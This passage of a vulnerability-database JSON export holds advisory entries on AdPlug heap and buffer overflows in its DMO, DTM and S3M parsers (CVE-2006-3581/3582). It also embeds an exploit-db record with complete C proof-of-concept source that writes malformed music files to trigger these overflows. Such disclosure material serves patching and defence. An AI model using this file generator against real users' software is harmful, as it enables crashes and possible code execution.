"software", "cvelist": ["CVE-2006-3582"], "edition": 1, "description": "## Vulnerability Description\nA local overflow exists in AdPlug. AdPlug fails to handle specially crafted DMO files when unpacking them resulting in a heap overflow. A length value read directly in the header of the DMO file is not properly checked or sanitized when being used to allocate a buffer. 
A heap overflow could occur while unpacking the file allowing for the execution of arbitrary code.\n## Solution Description\nUpgrade to version CVS 05 Jul 2006 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA local overflow exists in AdPlug. AdPlug fails to handle specially crafted DMO files when unpacking them resulting in a heap overflow. A length value read directly in the header of the DMO file is not properly checked or sanitized when being used to allocate a buffer. A heap overflow could occur while unpacking the file allowing for the execution of arbitrary code.\n## References:\nVendor URL: http://adplug.sourceforge.net/\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200607-13.xml)\n[Secunia Advisory ID:21869](https://secuniaresearch.flexerasoftware.com/advisories/21869/)\n[Secunia Advisory ID:21295](https://secuniaresearch.flexerasoftware.com/advisories/21295/)\n[Secunia Advisory ID:20972](https://secuniaresearch.flexerasoftware.com/advisories/20972/)\n[Secunia Advisory ID:21238](https://secuniaresearch.flexerasoftware.com/advisories/21238/)\n[Related OSVDB ID: 27042](https://vulners.com/osvdb/OSVDB:27042)\n[Related OSVDB ID: 27047](https://vulners.com/osvdb/OSVDB:27047)\n[Related OSVDB ID: 27046](https://vulners.com/osvdb/OSVDB:27046)\n[Related OSVDB ID: 27043](https://vulners.com/osvdb/OSVDB:27043)\n[Related OSVDB ID: 27045](https://vulners.com/osvdb/OSVDB:27045)\nOther Advisory URL: http://aluigi.altervista.org/adv/adplugbof-adv.txt\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200609-06.xml\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0108.html\n[CVE-2006-3582](https://vulners.com/cve/CVE-2006-3582)\n", "modified": "2006-07-06T07:48:59", "published": "2006-07-06T07:48:59", "href": "https://vulners.com/osvdb/OSVDB:27044", "id": "OSVDB:27044", "title": "AdPlug dmo.cpp DMO File 
Unpacking Overflow", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:23", "bulletinFamily": "software", "cvelist": ["CVE-2006-3581"], "edition": 1, "description": "## Vulnerability Description\nA local overflow exists in AdPlug. The 'dtm.cpp' library fails to sanitize user controlled fields in a DTM file resulting in a buffer overflow. With a specially crafted DTM file, an attacker can compromise applications using the library resulting in a loss of integrity.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nA local overflow exists in AdPlug. The 'dtm.cpp' library fails to sanitize user controlled fields in a DTM file resulting in a buffer overflow. With a specially crafted DTM file, an attacker can compromise applications using the library resulting in a loss of integrity.\n## References:\nVendor URL: http://adplug.sourceforge.net/\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200607-13.xml)\n[Secunia Advisory ID:21869](https://secuniaresearch.flexerasoftware.com/advisories/21869/)\n[Secunia Advisory ID:21295](https://secuniaresearch.flexerasoftware.com/advisories/21295/)\n[Secunia Advisory ID:20972](https://secuniaresearch.flexerasoftware.com/advisories/20972/)\n[Secunia Advisory ID:21238](https://secuniaresearch.flexerasoftware.com/advisories/21238/)\n[Related OSVDB ID: 27042](https://vulners.com/osvdb/OSVDB:27042)\n[Related OSVDB ID: 27047](https://vulners.com/osvdb/OSVDB:27047)\n[Related OSVDB ID: 27046](https://vulners.com/osvdb/OSVDB:27046)\n[Related OSVDB ID: 27044](https://vulners.com/osvdb/OSVDB:27044)\n[Related OSVDB ID: 27043](https://vulners.com/osvdb/OSVDB:27043)\nOther Advisory URL: http://aluigi.altervista.org/adv/adplugbof-adv.txt\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200609-06.xml\nMail List Post: 
http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0108.html\n[CVE-2006-3581](https://vulners.com/cve/CVE-2006-3581)\n", "modified": "2006-07-06T07:48:59", "published": "2006-07-06T07:48:59", "href": "https://vulners.com/osvdb/OSVDB:27045", "id": "OSVDB:27045", "title": "AdPlug dtm.cpp DTM File Processing Overflow", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:23", "bulletinFamily": "software", "cvelist": ["CVE-2006-3581"], "edition": 1, "description": "## Vulnerability Description\nA local overflow exists in AdPlug. AdPlug fails to handle specially crafted S3M files when unpacking them resulting in a heap overflow. A length value read directly in the header of the S3M file is not properly checked or sanitized when being used to allocate a buffer. A heap overflow could occur while unpacking the file allowing for the execution of arbitrary code.\n## Solution Description\nUpgrade to version CVS 05 Jul 2006 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA local overflow exists in AdPlug. AdPlug fails to handle specially crafted S3M files when unpacking them resulting in a heap overflow. A length value read directly in the header of the S3M file is not properly checked or sanitized when being used to allocate a buffer. 
A heap overflow could occur while unpacking the file allowing for the execution of arbitrary code.\n## References:\nVendor URL: http://adplug.sourceforge.net/\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200607-13.xml)\n[Secunia Advisory ID:21869](https://secuniaresearch.flexerasoftware.com/advisories/21869/)\n[Secunia Advisory ID:21295](https://secuniaresearch.flexerasoftware.com/advisories/21295/)\n[Secunia Advisory ID:20972](https://secuniaresearch.flexerasoftware.com/advisories/20972/)\n[Secunia Advisory ID:21238](https://secuniaresearch.flexerasoftware.com/advisories/21238/)\n[Related OSVDB ID: 27042](https://vulners.com/osvdb/OSVDB:27042)\n[Related OSVDB ID: 27047](https://vulners.com/osvdb/OSVDB:27047)\n[Related OSVDB ID: 27044](https://vulners.com/osvdb/OSVDB:27044)\n[Related OSVDB ID: 27043](https://vulners.com/osvdb/OSVDB:27043)\n[Related OSVDB ID: 27045](https://vulners.com/osvdb/OSVDB:27045)\nOther Advisory URL: http://aluigi.altervista.org/adv/adplugbof-adv.txt\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200609-06.xml\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0108.html\n[CVE-2006-3581](https://vulners.com/cve/CVE-2006-3581)\n", "modified": "2006-07-06T07:48:59", "published": "2006-07-06T07:48:59", "href": "https://vulners.com/osvdb/OSVDB:27046", "id": "OSVDB:27046", "title": "AdPlug s3m.cpp S3M File Processing Overflow", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-03T07:35:40", "description": "AdPlug 2.0 Multiple Remote File Buffer Overflow Vulnerabilities. CVE-2006-3581. 
Remote exploit for linux platform", "published": "2006-07-06T00:00:00", "type": "exploitdb", "title": "AdPlug 2.0 - Multiple Remote File Buffer Overflow Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3581"], "modified": "2006-07-06T00:00:00", "id": "EDB-ID:28181", "href": "https://www.exploit-db.com/exploits/28181/", "sourceData": "source: http://www.securityfocus.com/bid/18859/info\r\n\r\nThe AdPlug library is affected by multiple remote buffer-overflow vulnerabilities. These issues are due to the library's failure to properly bounds-check user-supplied input before copying it into insufficiently sized memory buffers.\r\n\r\nThese issues allow remote attackers to execute arbitrary machine code in the context of the user running applications that use the affected library to open attacker-supplied malicious files.\r\n\r\nThe AdPlug library version 2.0 is vulnerable to these issues; previous versions may also be affected.\r\n\r\n/*\r\n\r\nby Luigi Auriemma\r\n\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n\r\n\r\n\r\n#define VER \"0.1\"\r\n#define MODULESIZE 0x10000\r\n\r\n#define LOWORD(l) ((l) & 0xffff)\r\n#define HIWORD(l) ((l) >> 16)\r\n#define LOBYTE(w) ((w) & 0xff)\r\n#define HIBYTE(w) ((w) >> 8)\r\n#define ARRAY_AS_DWORD(a, i) ((a[i + 3] << 24) + (a[i + 2] << 16) + (a[i + 1] << 8) + a[i])\r\n#define ARRAY_AS_WORD(a, i) ((a[i + 1] << 8) + a[i])\r\n#define CHARP_AS_WORD(p) (((*(p + 1)) << 8) + (*p))\r\n\r\n\r\n\r\nunsigned short dmo_unpacker_brand(unsigned short range);\r\nint dmo_unpacker_decrypt(unsigned char *buf, long len);\r\nvoid std_err(void);\r\n\r\n\r\n\r\n#pragma pack(1)\r\n\r\nstruct {\r\n char id[16];\r\n unsigned char version;\r\n unsigned short size;\r\n unsigned char packed;\r\n unsigned char reserved[12];\r\n} cff_head;\r\n\r\nstruct {\r\n char id[18];\r\n unsigned short crc;\r\n unsigned short size;\r\n} mtk_head;\r\n\r\nstruct {\r\n char id[12];\r\n unsigned char version;\r\n char 
title[20];\r\n char author[20];\r\n unsigned char numpat;\r\n unsigned char numinst;\r\n} dtm_head;\r\n\r\nstruct {\r\n char name[28];\r\n unsigned char kennung;\r\n unsigned char typ;\r\n unsigned char dummy[2];\r\n unsigned short ordnum;\r\n unsigned short insnum;\r\n unsigned short patnum;\r\n unsigned short flags;\r\n unsigned short cwtv;\r\n unsigned short ffi;\r\n char scrm[4];\r\n unsigned char gv;\r\n unsigned char is;\r\n unsigned char it;\r\n unsigned char mv;\r\n unsigned char uc;\r\n unsigned char dp;\r\n unsigned char dummy2[8];\r\n unsigned short special;\r\n unsigned char chanset[32];\r\n} s3m_head;\r\n\r\n#pragma pack()\r\n\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n FILE *fd;\r\n int i,\r\n j,\r\n attack,\r\n buffsz,\r\n compsz;\r\n unsigned char *buff,\r\n *comp;\r\n\r\n fputs(\"\\n\"\r\n \"AdPlug library <= 2.0 and CVS <= 04 Jul 2006 multiple overflow \"VER\"\\n\"\r\n \"by Luigi Auriemma\\n\"\r\n \"e-mail: aluigi@autistici.org\\n\"\r\n \"web: aluigi.org\\n\"\r\n \"\\n\", stdout);\r\n\r\n if(argc < 2) {\r\n printf(\"\\n\"\r\n \"Usage: %s <attack> <file_to_create>\\n\"\r\n \"\\n\"\r\n \"Attack:\\n\"\r\n \" 1 = heap overflow in the unpacking of CFF files\\n\"\r\n \" 2 = heap overflow in the unpacking of MTK files\\n\"\r\n \" 3 = heap overflow in the unpacking of DMO files\\n\"\r\n \" 4 = buffer-overflow in DTM files\\n\"\r\n \" 5 = buffer-overflow in S3M files\\n\"\r\n \" 6 = heap overflow in the unpacking of U6M files\\n\"\r\n \"\\n\"\r\n \"Note: this proof-of-concept is experimental and doesn't contain the code for\\n\"\r\n \" compressing the data so you must edit it for adding the missing code if\\n\"\r\n \" you have it\\n\"\r\n \" Actually only attack 4 and 5 can be considered completed!\\n\"\r\n \"\\n\", argv[0]);\r\n exit(1);\r\n }\r\n\r\n attack = atoi(argv[1]);\r\n\r\n printf(\"- create file %s\\n\", argv[2]);\r\n fd = fopen(argv[2], \"rb\");\r\n if(fd) {\r\n fclose(fd);\r\n printf(\"- do you want to overwrite it (y/N)?\\n \");\r\n 
fflush(stdin);\r\n if((fgetc(stdin) | 0x20) != 'y') exit(1);\r\n }\r\n fd = fopen(argv[2], \"wb\");\r\n if(!fd) std_err();\r\n\r\n if(attack == 1) { /* CFF */\r\n buffsz = MODULESIZE + 256;\r\n\r\n buff = malloc(buffsz);\r\n\r\n memset(buff, 0, MODULESIZE);\r\n memcpy(&buff[0x5E1], \"CUD-FM-File - SEND A POSTCARD -\", 31); // for quick return\r\n memset(buff + MODULESIZE, 'a', buffsz - MODULESIZE);\r\n\r\n /*\r\n DATA MUST BE COMPRESSED WITH A PARTICULAR TYPE OF LZW!!!\r\n I DON'T KNOW THE COMPRESSION ALGORITHM SO DATA IS STORED AS IS\r\n */\r\n // compsz = 16 + compress(buff, comp + 16, buffsz);\r\n comp = buff;\r\n compsz = buffsz;\r\n\r\n memcpy(comp, \"YsComp\"\"\\x07\"\"CUD1997\"\"\\x1A\\x04\", 16);\r\n\r\n memcpy(cff_head.id, \"<CUD-FM-File>\"\"\\x1A\\xDE\\xE0\", sizeof(cff_head.id));\r\n cff_head.version = 1;\r\n cff_head.size = compsz;\r\n cff_head.packed = 1;\r\n memset(cff_head.reserved, 0, sizeof(cff_head.reserved));\r\n\r\n fwrite(&cff_head, sizeof(cff_head), 1, fd);\r\n fwrite(comp, compsz, 1, fd);\r\n\r\n } else if(attack == 2) { /* MTK */\r\n buffsz = 0xffff;\r\n\r\n buff = malloc(buffsz);\r\n\r\n memset(buff, 'a', buffsz);\r\n\r\n /*\r\n DATA MUST BE COMPRESSED!!!\r\n I DON'T KNOW THE COMPRESSION ALGORITHM SO DATA IS STORED AS IS\r\n */\r\n // compsz = compress(buff, comp, buffsz);\r\n comp = buff;\r\n compsz = buffsz;\r\n\r\n strncpy(mtk_head.id, \"mpu401tr\\x92kk\\xeer@data\", 18);\r\n mtk_head.crc = 0;\r\n mtk_head.size = 0; // heap overflow\r\n\r\n fwrite(&mtk_head, sizeof(mtk_head), 1, fd);\r\n fwrite(comp, compsz, 1, fd);\r\n\r\n } else if(attack == 3) { /* DMO */\r\n printf(\"- not implemented!\\n\");\r\n\r\n } else if(attack == 4) { /* DTM */\r\n strncpy(dtm_head.id, \"DeFy DTM \", sizeof(dtm_head.id));\r\n dtm_head.version = 0x10;\r\n strncpy(dtm_head.title, \"title\", sizeof(dtm_head.title));\r\n strncpy(dtm_head.author,\"author\", sizeof(dtm_head.author));\r\n dtm_head.numpat = 0;\r\n dtm_head.numinst = 0;\r\n\r\n fwrite(&dtm_head, 
sizeof(dtm_head), 1, fd);\r\n\r\n for(i = 0; i < 15; i++) fputc(0, fd);\r\n buffsz = 140; // <== buffer-overflow\r\n buff = malloc(buffsz);\r\n memset(buff, 'a', buffsz);\r\n fputc(buffsz, fd);\r\n fwrite(buff, buffsz, 1, fd);\r\n\r\n for(i = 0; i < 100; i++) fputc(0, fd);\r\n\r\n } else if(attack == 5) { /* S3M */\r\n strncpy(s3m_head.name, \"name\", sizeof(s3m_head.name));\r\n s3m_head.kennung = 0x1a;\r\n s3m_head.typ = 16;\r\n memset(s3m_head.dummy, 0, sizeof(s3m_head.dummy));\r\n s3m_head.ordnum = 0;\r\n s3m_head.insnum = 120; // <== buffer-overflow\r\n s3m_head.patnum = 0; // <== buffer-overflow\r\n s3m_head.flags = 0;\r\n s3m_head.cwtv = 0;\r\n s3m_head.ffi = 0;\r\n memcpy(s3m_head.scrm, \"SCRM\", sizeof(s3m_head.scrm));\r\n s3m_head.gv = 0;\r\n s3m_head.is = 0;\r\n s3m_head.it = 0;\r\n s3m_head.mv = 0;\r\n s3m_head.uc = 0;\r\n s3m_head.dp = 0;\r\n memset(s3m_head.dummy2, 0, sizeof(s3m_head.dummy2));\r\n s3m_head.special = 0;\r\n for(i = 0; i < 32; i++) s3m_head.chanset[i] = 0;\r\n\r\n fwrite(&s3m_head, sizeof(s3m_head), 1, fd);\r\n for(i = 0; i < s3m_head.ordnum; i++) fputc('a', fd);\r\n for(i = 0; i < s3m_head.insnum; i++) { fputc('1', fd); fputc('0', fd); } // little endian\r\n for(i = 0; i < s3m_head.patnum; i++) { fputc('1', fd); fputc('0', fd); } // little endian\r\n\r\n for(i = 0; i < s3m_head.insnum; i++) {\r\n for(j = 0; j < 80; j++) fputc(0, fd);\r\n }\r\n\r\n for(i = 0; i < s3m_head.patnum; i++) {\r\n /* skipped */\r\n }\r\n\r\n } else if(attack == 6) { /* U6M */\r\n buffsz = 1000;\r\n buff = malloc(buffsz);\r\n\r\n memset(buff, 0, buffsz);\r\n /*\r\n DATA MUST BE COMPRESSED WITH A PARTICULAR TYPE OF LZW!!!\r\n I DON'T KNOW THE COMPRESSION ALGORITHM SO DATA IS STORED AS IS\r\n */\r\n // compsz = compress(buff, comp, buffsz);\r\n comp = buff;\r\n compsz = buffsz;\r\n\r\n fputc(buffsz & 0xff, fd);\r\n fputc((buffsz >> 8) & 0xff, fd);\r\n fputc(0, fd);\r\n fputc(0, fd);\r\n fputc(0, fd);\r\n fputc(1, fd);\r\n\r\n fwrite(comp, compsz, 1, fd);\r\n 
}\r\n\r\n fclose(fd);\r\n printf(\"- finished\\n\");\r\n return(0);\r\n}\r\n\r\n\r\n\r\nvoid std_err(void) {\r\n perror(\"\\nError\");\r\n exit(1);\r\n}", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/28181/"}]}